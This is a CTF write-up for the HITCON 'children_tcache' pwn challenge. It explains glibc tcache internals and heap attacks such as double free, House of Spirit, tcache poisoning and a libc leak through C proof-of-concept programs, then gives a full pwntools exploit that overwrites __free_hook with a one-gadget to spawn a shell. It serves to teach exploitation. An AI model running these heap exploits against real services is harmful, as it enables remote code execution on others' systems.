children_tcache writeup and tcache overview

Event: HITCON
Category: pwn
Points: 246
Solves: 34

This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry - I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in the year 2017. It’s objective is to speed up the heap management. Older algorithms are not removed, but they are still used sometimes - for example for bigger chunks, or when an appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to a lack of heap integrity checks.

The convention used in this post is that we call the pointer to the next chunk fd, and to the previous - bk as it is called originally in normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. The all source code that is interesting for us is located in a file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

Both of these functions can be called at the beginning of functions _int_free and __libc_malloc. tcache_put is called when the requested size of the allocated region is not greater than 0x408 and tcache bin that is appropriate for a given size is not full. A maximum number of chunks in one tcache bin is mp_.tcache_count and this variable is set to 7 by default. This variable is set here and the root is at the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk of the size of tcache bin and the appropriate bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a single linked list, similar to fastbin - it contains only a pointer to a next chunk. Also, the list is LIFO, like in fastbins. But there is a difference - each tcache bin remebers how many chunks belong to this bin in a variable tcache->counts[tc_idx].

What’s strange calloc doesn’t allocate from tcache bin.

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
}

As a result, we got the same pointer 2 times.

On older glibc (<2.26) to get the same result this attack is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
}

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk between due to this integrity check - we cannot add a new chunk to a fastbin list when there is already the same chunk on top. printf is called at the beginning because program crashes otherwise. Probably this is because when printf is called for the first time it initializes his buffer by mallocing some area.

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing never allocated region we put it in the tcache bin list. And we can obtain this region when malloc is called with appropriate size as an argument. This is useful when we have the ability to overwrite some pointer by buffer overflow.

In older glibc we needed to put more effort due to this healthcheck. We need to create another fake chunk after the fried one. Like here.

tcache/fastbin poisoning

If we want to exploit malloc to return a pointer to a controlled location we can simply overwrite a pointer to a next chunk. We can forget about this integrity check in older mechanism:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin 0x38 contains: b -> a 
	b[0]=&var;
	// tcache bin 0x38 contains: b -> var
	malloc(0x38);
	// tcache bin 0x38 contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

We cannot do this by freeing only one chunk because each tcache bin remebers how many chunks belong to this bin.

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

This program prints fd of the chunk inside an unsorted bin. fd of the last chunk and bk in the first chunk in an unsorted bin are set to a pointer in libc.

If we can request malloc of at most 0x100 size this won’t work because the fried chunk won’t go to an unsorted bin list but to a tcache bin. It works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

Hopefully if we make tcache bin full (max capacity is 7 chunks), deallocated chunk will be put in unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n",a[0]);
}

tcache attacks summary

More attacks exist for glibc with tcache. For example House of Force works in the same way as previously. Also, it’s easy to make overlapping chunks by overwriting size to a bigger value. After tcache was introduced heap exploitation is much easier. The exception is a buffer overflow by a single NULL byte, like in children tcache CTF task. I used an old attack with chunks of the smallbin size. I prevented them from going into the tcache, by making the tcache bin full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

Decompiled binary looks like below:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can

create chunk on the heap and read data into it
delete a chunk
print data in a chunk

Everything is fine, except new_heap function which is vulnerable to buffer overflow by single NULL byte. Before free, the area is filled with 0xDA byte. We can have max 10 chunks allocated at the same time and maximum requested size of a chunk is 0x2000.

In older version of glibc this attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n",((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free chunk of the size of smallbin, there is a check whether its neighbour is freed. If so, it will consolidate with it. When we free c chunk it consolidates with a and b because of 2 reasons:

We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
}

a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped allocation and deletion of B chunk because it is not needed. After c is freed, we have one unsorted bin that contains the area that is a summary of a, b and c areas. After we allocated chunk A, the unsorted bin split to 2 parts. One part was returned by malloc, the other part remained at the unsorted bin and the chunk begins at the same place when b.

In our examples, the first allocated chunk has a different size than others which is 0x108. The example would work with 0xf8 but in this challenge, strcpy is used so it breaks on NULL byte so we couldn’t overwrite prev_size by 0x200 value. With size equal to 0x108 we can overwrite prev_size to 0x210.

We can accomplish the same attack on a newer libc, by using the same algorithm. But there is one difference - before freeing chunks we need to make tcache bin full. So the attack below does the same leak as the attack previously but also it goes further. After the leak, it causes double free because B and b point to the same chunk of size 0x1f8. Later, this attack is performed.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now, 0x1F8 tcache bin contains 2 the same chunks 

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = &var;
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

And the last step is to implement an exploit in python. It does the same thing as previous code, except that malloc returns to us a region at &__free_hook. Then we overwrite __free_hook to one-gadget RCE. Later it calls free.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev size
# This is tricky because data to chunk is copied by strcpy which 
# stops copying on NULL byte.
# If we want to clean an region we need to free and allocate several
# chunks that each next size is lower than 1 byte.  
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c have prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are ful
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
# We can use double free and tcache poisoning attack

# double free
delete_heap(B)
delete_heap(b)
# now 0x1F8 tcache bin contains 2 the same chunks

# allocate one of them and set next pointer to known address
b = new_heap(0x1f8, p64(ADDR_TO_WRITE))

new_heap(0x1f8, "kkkk")

# allocated chunk will have an address of &__free_hook, 
# overwrite __free_hook to one-gadget RCE there
super_pointer = new_heap(0x1f8, p64(libc_base + 0x04F322))

# trigger __free_hook that is overwritten to one-gadget RCE
delete_heap_and_shell(b)

References

heap-exploitation - a good book to start heap exploitation